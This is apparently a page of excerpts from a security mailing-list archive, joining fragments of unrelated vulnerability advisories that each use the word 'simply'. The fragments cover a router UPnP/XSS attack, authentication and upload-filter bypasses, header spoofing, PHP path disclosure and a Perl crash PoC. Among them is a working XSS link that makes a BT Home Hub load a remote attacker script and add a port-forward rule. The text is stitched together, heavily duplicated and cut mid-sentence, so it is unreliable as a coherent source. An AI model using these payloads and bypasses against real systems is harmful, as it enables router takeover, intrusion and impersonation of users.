Next Page >>
simply
However, there is no attempt by the CSS to prevent clients from
supplying their own ClientCert-* headers. Depending on how application
developers handle multiple copies of these headers, an attacker may be
able to impersonate other users.
For example, assuming that a back-end web application simply trusts
the user identity supplied by the CSS in the ClientCert-Subject-CN
header and userX wants to impersonate userY, he may simply insert
the following HTTP header(s) in the HTTP request issued to the
server:
files attachments. An attacker has to convince a user to view the
malicious file in order to run the evil code.
The only browser found affected is Internet Explorer +5.0, other
browsers (FF/Chrome/Opera..) seems to handle the issue correctly (or
simply blindly?)
IP.Board v2.x set the MIME-type of *.txt files to
(application/x-dirview). If the *.txt file contains JavaScript/HTML it
will simply be parsed on IE +5.
<script defer>code</script>
The defer property is an IE-ism which solves the problem, documented by
Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.
Now that we are armed with knowledge of this trick, because these help
documents are in a privileged zone, we can simply execute commands.
You can test this with a command like so (assuming a recent IE):
C:\> ver
Microsoft Windows XP [Version 5.1.2600]
> <script defer>code</script>
>
> The defer property is an IE-ism which solves the problem, documented by
> Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.
> Now that we are armed with knowledge of this trick, because these help
> documents are in a privileged zone, we can simply execute commands.
>
> You can test this with a command like so (assuming a recent IE):
>
> C:\> ver
> Microsoft Windows XP [Version 5.1.2600]
<script defer>code</script>
The defer property is an IE-ism which solves the problem, documented by
Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.
Now that we are armed with knowledge of this trick, because these help
documents are in a privileged zone, we can simply execute commands.
You can test this with a command like so (assuming a recent IE):
C:\> ver
Microsoft Windows XP [Version 5.1.2600]
gateway is a BT Home Hub, clicking on the following link should add a
new forward rule called EVILFORWARDRULE: ATTACK
<http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=>
In order to check if the port-forwarding rule was added successfully
you can use UPnP Port Forwarding Utility [5] and simply click on
"Update list now" after the device has been discovered (device name
should show on the top-left corner a few seconds later after launching
the tool). You could of course use the technique and code explained in
this post on any Internet gateway that supports UPnP and is a
vulnerable to a preauth XSS vulnerability. If you manage to
silently execute in the background. At that moment the attacker will
have control over their router, pretty much regardless of its model.
Many of the home routers are vulnerable to this attack as many of them
support UPnP to one degree or another.
The attack does not rely on any bugs. Simply put, when two completely
legitimate technologies, Flash and UPnP, are combined together, they
compose a vulnerability, which exposes many home networks to a great
risk. The attack depends on the fact that most, if not all, routers
are UPnP enabled. The UPnP SOAP service can be accessed without
authorization over the default Web Admin Interface. With the help of
Because the authentication takes place in templates/header.html in an
embedded piece of PHP code, depending on server configuration, this code
might not be executed. Unless the web server is specifically configured
to execute PHP embeded in HTML files server site the PHP code will
instead simply be passed back to clients as actual HTML.
Authentication bypass is possible by simply appending the GET variable
'login=1' to the URL. For example, to access the Calendar page, calling
the URL 'http://target.tld/ppim/calendar.php' will redirect the
unauthenticated user to the login page. However, calling the URL
o Denial Of Service:
===================
The M3U file format allows it to include local and remote files by
simply specifing the path to the desired file. Furthermore Winamp does
not check if the M3U file to include is the currently processed M3U
file wherefore it's possible to force Winamp to recursively read a
certain M3U file. Winamp allocates memory by each iteration which
leads to a stack overflow exception (0xc00000fd).
bmo> o Denial Of Service:
bmo> ===================
bmo> The M3U file format allows it to include local and remote files by
bmo> simply specifing the path to the desired file. Furthermore Winamp does
bmo> not check if the M3U file to include is the currently processed M3U
bmo> file wherefore it's possible to force Winamp to recursively read a
bmo> certain M3U file. Winamp allocates memory by each iteration which
bmo> leads to a stack overflow exception (0xc00000fd).
variants of an unrelated MS Excel vulnerability in BIFF file formats
reported in CORE-2009-0827 as not relevant to security because it can
only be triggered to cause a copy operation from memory locations above
3GB which would terminate the application without any possibility for
exploitation. The assumption that accesses to memory addresses above 3GB
will simply terminate the process is no longer valid in the context of
the Virtual PC hypervisor bug and thus this may outline another scenario
for exploitation of bugs that may have been deemed unexploitable before
and for which it is probable that fixes have not been developed.
. 2009-11-12:
> If so, the cost of security by blocking may be unjustifiable.
Absolutely - If possible, please read the article at:
http://www.securityfocus.com/infocus/1900/1
It's dated, but the concepts hold true. The entire implementation is based on research and analysis, and of course, business applicability. To be sure, I receive significant US-based attack traffic, but I can't block that for business reasons. Unfortunately, many people see "block China" and immediately say "oh, that's unrealistic and ineffective." This is not an Internet based suggestion - it is a simply a toolset one may use to implement country-by-country, protocol-by-protocol based access policy. It's the same thing we do now from a protocol standpoint, but this simply allows one to aggregate data by geographic location. I have no business need for traffic to/from China and many other countries (which I also block) so even in the absence of hard attack traffic, "least privilege" dictates that it is valid to disallow traffic from sources that are not needed.
>
> 2. Urgency
>
WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution
II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards,
and usability. WordPress is both free and priceless at the same time. More simply, WordPress is
what you use when you want to work with your blogging software, not fight it.
III. DESCRIPTION
-------------------------
A site with a screen shot:
http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha
I found a security problem with the pam_captcha. If you enter a username
that is not a valid user followed by the correct CAPTCHA, you do not get
prompted for a password. You simply get prompted for another CAPTCHA.
However, if you enter a username that is a valid user followed by the
correct CAPTCHA, you will get prompted for a password. This means an
attacker, or a script/bot could easily harvest a list of valid usernames
simply by whether or not it prompts for a password after a valid captcha
entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's
> If so, the cost of security by blocking may be unjustifiable.
Absolutely - If possible, please read the article at:
http://www.securityfocus.com/infocus/1900/1
It's dated, but the concepts hold true. The entire implementation is based on research and analysis, and of course, business applicability. To be sure, I receive significant US-based attack traffic, but I can't block that for business reasons. Unfortunately, many people see "block China" and immediately say "oh, that's unrealistic and ineffective." This is not an Internet based suggestion - it is a simply a toolset one may use to implement country-by-country, protocol-by-protocol based access policy. It's the same thing we do now from a protocol standpoint, but this simply allows one to aggregate data by geographic location. I have no business need for traffic to/from China and many other countries (which I also block) so even in the absence of hard attack traffic, "least privilege" dictates that it is valid to disallow traffic from sources that are not needed.
>
> 2. Urgency
>
If you can parse out XML, I'm sure you can script up something to "build" sets for IPTables. However, I don't know that IPTables has the ability to "group" the individual IP ranges into "sets" as opposed to simply putting them in as line-by-line rules.
That's the beauty of ISA/TMG/UAG - the xml files build individual sets comprised of IP ranges which you can apply by themselves to whatever protocols you wants to/from whatever network sources you want. But, regardless of the chosen platform, at least you can parse out the XML to get what you want.
The important fields are:
<fpc4:IPFrom dt:dt="string">66.227.2.137</fpc4:IPFrom>
<fpc4:IPTo dt:dt="string">66.227.2.144</fpc4:IPTo>
<fpc4:Name dt:dt="string">AL1122173577-1122173584</fpc4:Name>
Where IPFrom is the beginning IP of the range, IPTo is the ending IP of the range, and "Name" is a unique name for the range itself. I chose to have the same simply be the country code followed by the range so it could be immediately identified even if used outside of a set.
gather the real path of the server side script.
The mysqli_real_escape_string() PHP function takes strings as parameters
and will raise warnings when values that are passed are arrays rather
then strings.
To get the path of the current script, you simply need to pass the
arguments as arrays rather then expected strings
and then simply read the warning message generated by PHP to see the
error including the full path of the current running script.
Proof of concept:
preg_match() php function which allow attackers to
gather the real path of the server side script.
The preg_match() PHP function takes strings as parameters and will raise
warnings when values that are passed are arrays rather then strings.
To get the path of the current script, you simply need to pass the
arguments as arrays rather then expected strings
and then simply read the warning message generated by PHP to see the
error including the full path of the current running script.
Proof of concept:
For example on Windows OS is possible to exploit this vulnerability by
requesting an upload with the filename "foo.php.".
This string will bypass the check and since Windows does not permit
filenames ending with a dot, modifying it in a transparent way, the final
name of the file will simply be "foo.php.".
A similar result can be obtained on GNU/Linux by requesting an upload
with the filename "foo.php/."
Note that the integrated webmail feature that allows a user to write
3. *Vulnerability Description*
Several vulnerabilities have been discovered in Sun Java System Calendar
Express web server [1]. First, an attacker can crash the web server
creating a Denial of Service condition by simply requesting certain URL
twice. Second, several Cross-site scripting vulnerabilities [2], [3]
were found in the following files/urls:
1. 'https://<server>:3443/login.wcap'
2. 'https://<server>:3443/command.shtml'
Katharsis, all from #dark-coders and others;]
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
($req['s'] == 7) <-- *bypass line*
)
This piece of code allows a normal user to bypass role filtering and to be granted admin role as a normal user. To exploit the vulnerability simply send to getxml.php, while into the chat, this post data string (for example intercepting and modifying a legal message packet sent to the server with tamper data plugin of firefox):
for example to ban a user simply add the bypass to the normal ban string request:
replace:
//normal message sent to server thas has being intercepted
this is a security vulnerability in a traditional sense. I completely agree
with you. Think about it this way... When you press the power button on the
machine and it performs a graceful shutdown, stuff happens inside of the
operating system. That stuff happens at an elevated privilege level. If
there were some way to hook into the stuff that happens, you (as an
unauthenticated user), could do bad things (besides simply shutting down the
system) using that hook simply by pressing the power button at the logon
screen. For example, if Jim wants to know what Nancy is working on, he could
write a program which e-mails him the contents of her "My Documents" folder
that is triggered by a hook into that process. All Jim needs to do is get
Nancy to run that program on her system (not hard) and walk by her office
> machine and it performs a graceful shutdown, stuff happens inside of
> the
> operating system. That stuff happens at an elevated privilege level.
If
> there were some way to hook into the stuff that happens, you (as an
> unauthenticated user), could do bad things (besides simply shutting
> down the
> system) using that hook simply by pressing the power button at the
> logon
> screen. For example, if Jim wants to know what Nancy is working on, he
> could
> > machine and it performs a graceful shutdown, stuff happens inside of
> > the
> > operating system. That stuff happens at an elevated privilege level.
> If
> > there were some way to hook into the stuff that happens, you (as an
> > unauthenticated user), could do bad things (besides simply shutting
> > down the
> > system) using that hook simply by pressing the power button at the
> > logon
> > screen. For example, if Jim wants to know what Nancy is working on,
> he
> > machine and it performs a graceful shutdown, stuff happens inside of
> > the
> > operating system. That stuff happens at an elevated privilege level.
> If
> > there were some way to hook into the stuff that happens, you (as an
> > unauthenticated user), could do bad things (besides simply shutting
> > down the
> > system) using that hook simply by pressing the power button at the
> > logon
> > screen. For example, if Jim wants to know what Nancy is working on,
> he
> > > the
> > > operating system. That stuff happens at an elevated privilege
> level.
> > If
> > > there were some way to hook into the stuff that happens, you (as an
> > > unauthenticated user), could do bad things (besides simply shutting
> > > down the
> > > system) using that hook simply by pressing the power button at the
> > > logon
> > > screen. For example, if Jim wants to know what Nancy is working on,
> > he
I am pleased to announce that the 1st Edition of Summer Camp 2008 will
be held on 4, 5 and 6 of July in Spain and all you are invited to come
to this event.
This invitation is for anyone interested in security, technology, or
that simply wants to learn, to teach, to meet with old or new friends
and/or participate in this event.
You can get more detailed information in our website:
http://associacio-aoe.org/scg/
local and remote admins for managing the wincomlpd server.
The problem here is very simple: the authentication method used by
the program is practically unexistent.
In short an attacker can manage the wincomlpd server without knowing
the admin username and password but simply skipping the auth stage.
This bug can be exploited in at least two ways: writing an alternative
client (the protocol is enough simple so it's not a problem) or just
modifying the admin client program (LPDAdmin.exe).
-------------------------------
B] scripts source visualization
-------------------------------
All the custom scripts in the server (like the LUA scripts with lsp
extension) can be visualized entirely instead of being executed simply
using a '+', a dot or any other char major than 0x7f after the script's
name.
------------------------------------
Next Page>>
|
